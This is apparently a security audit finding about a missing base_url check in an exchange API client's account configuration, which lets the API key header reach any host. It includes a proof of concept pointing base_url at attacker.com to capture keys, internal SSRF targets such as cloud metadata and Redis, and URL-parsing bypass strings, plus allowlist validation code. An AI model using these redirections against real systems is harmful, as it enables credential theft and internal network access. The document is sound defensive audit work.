MCP-02: base_url Accepts Arbitrary URLs - SSRF via Configuration
Severity: HIGH
Affected File(s): config.py:71-88
Description
The add_account, add_account_v3, update_account, and update_account_v3 methods accept any URL as base_url without validation. No URL scheme or hostname validation is performed. The URL flows into all API requests and the X-MBX-APIKEY header is sent to whatever host is configured.
Vulnerable Code
# No scheme or host validation: whatever string the caller supplies becomes
# the destination of every signed request that carries X-MBX-APIKEY.
self._config["accounts"][account_id] = {
    "base_url": base_url.rstrip("/"),
    ...
}
Impact
If base_url is set to http://169.254.169.254 (cloud metadata), http://localhost:6379 (Redis), or an attacker-controlled server, every signed request for that account, including its X-MBX-APIKEY header, is sent there. The API key travels in a header that is independent of the request signature, so signing offers no protection: against an attacker-controlled host this is direct API key theft, and with a plain http:// URL the key also crosses the network in cleartext. Against internal hosts the client becomes an SSRF pivot that reaches services not otherwise exposed. Because the only check is the caller's, anyone who can invoke these methods or edit the stored configuration controls the destination; no network-level attack is required.
Proof of Concept
1. Configure an account with base_url=http://attacker.com via add_account or update_account (or their _v3 variants).
2. Every subsequent API call for that account sends a signed request, with the X-MBX-APIKEY header, to attacker.com, where a plain HTTP listener records the key.
Recommended Fix
Validate base_url against an allowlist of known Aster API hosts:
ALLOWED_HOSTS = {"fapi.asterdex.com", "sapi.asterdex.com"}
Parse the URL and compare the hostname exactly against the allowlist (an exact match, not a substring or prefix check, so fapi.asterdex.com.attacker.example fails). Reject non-HTTPS URLs, URLs carrying userinfo (https://fapi.asterdex.com@attacker.example parses with attacker.example as the host), and non-default ports. Apply the validation before the value is written to the config in add_account, add_account_v3, update_account, update_account_v3.
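The following is an added example of the recommended check, written for this finding; it is not code from the audited project. The allowlist is the one given above. The function names validate_base_url, is_allowed_base_url and store_account, and the rule that the allowed hosts serve the API at the URL root (so any path is rejected), are assumptions made here.

```python
# Added example for finding MCP-02 (not the project's own code).
# Assumptions: ALLOWED_HOSTS is taken from the Recommended Fix; the function
# names are hypothetical; the allowed hosts are assumed to serve the API at
# the URL root, so paths, queries and fragments are rejected outright.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"fapi.asterdex.com", "sapi.asterdex.com"}
DEFAULT_HTTPS_PORT = 443


class InvalidBaseUrl(ValueError):
    """Raised when a base_url fails the allowlist checks."""


def validate_base_url(base_url: str) -> str:
    """Return a canonical 'https://<host>' for an allowlisted host, or raise.

    Checks, in order: https scheme, no userinfo, exact (not substring) host
    match against ALLOWED_HOSTS, default port only, and no path/query/fragment.
    """
    if not isinstance(base_url, str) or not base_url.strip():
        raise InvalidBaseUrl("base_url must be a non-empty string")

    try:
        parts = urlsplit(base_url.strip())
    except ValueError as exc:  # e.g. unbalanced brackets in the authority
        raise InvalidBaseUrl("base_url is not a parseable URL") from exc

    # 1. Scheme: plain http would send X-MBX-APIKEY in cleartext.
    if parts.scheme.lower() != "https":
        raise InvalidBaseUrl(f"scheme must be https, got {parts.scheme!r}")

    # 2. Userinfo: 'https://fapi.asterdex.com@evil.example' parses with
    #    hostname 'evil.example'; reject any credentials in the authority.
    if parts.username is not None or parts.password is not None:
        raise InvalidBaseUrl("userinfo is not allowed in base_url")

    # 3. Host: urlsplit lower-cases hostname; an exact set membership test
    #    rejects 'fapi.asterdex.com.evil.example' and IP literals alike.
    host = parts.hostname
    if host is None or host not in ALLOWED_HOSTS:
        raise InvalidBaseUrl(f"host {host!r} is not an allowed Aster API host")

    # 4. Port: .port raises ValueError on junk like ':abc'; treat that as invalid.
    try:
        port = parts.port
    except ValueError as exc:
        raise InvalidBaseUrl("malformed port in base_url") from exc
    if port is not None and port != DEFAULT_HTTPS_PORT:
        raise InvalidBaseUrl(f"non-default port {port} is not allowed")

    # 5. Path/query/fragment (assumed unnecessary for these hosts): rejecting
    #    them stops '/..', '?redirect=' and similar from riding along.
    if parts.path.strip("/") or parts.query or parts.fragment:
        raise InvalidBaseUrl("base_url must not carry a path, query, or fragment")

    return f"https://{host}"


def is_allowed_base_url(base_url: str) -> bool:
    """Boolean form of validate_base_url for callers that do not want to catch."""
    try:
        validate_base_url(base_url)
        return True
    except InvalidBaseUrl:
        return False


def store_account(config: dict, account_id: str, base_url: str) -> dict:
    """Hypothetical stand-in for add_account/update_account: the URL is
    validated and canonicalised before anything is written to the config."""
    entry = {"base_url": validate_base_url(base_url)}
    config.setdefault("accounts", {})[account_id] = entry
    return entry


if __name__ == "__main__":
    probes = [
        "https://fapi.asterdex.com/",                  # allowed
        "HTTPS://SAPI.ASTERDEX.COM",                   # allowed after normalisation
        "http://169.254.169.254",                      # cloud metadata, plain http
        "http://localhost:6379",                       # Redis
        "https://fapi.asterdex.com@attacker.example",  # userinfo trick
        "https://fapi.asterdex.com.attacker.example",  # suffix trick
        "https://fapi.asterdex.com:8443",              # non-default port
        "https://fapi.asterdex.com/../x",              # path smuggling
    ]
    for url in probes:
        print(f"{url:48} -> {'ALLOW' if is_allowed_base_url(url) else 'REJECT'}")
```

The returned value is the canonical form that should be stored, so the existing rstrip("/") becomes unnecessary; the probe list in the __main__ block covers the bypasses an allowlist built on substring matching would miss.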
Methodology: Triple-verification static analysis -- each finding verified across three independent code review passes.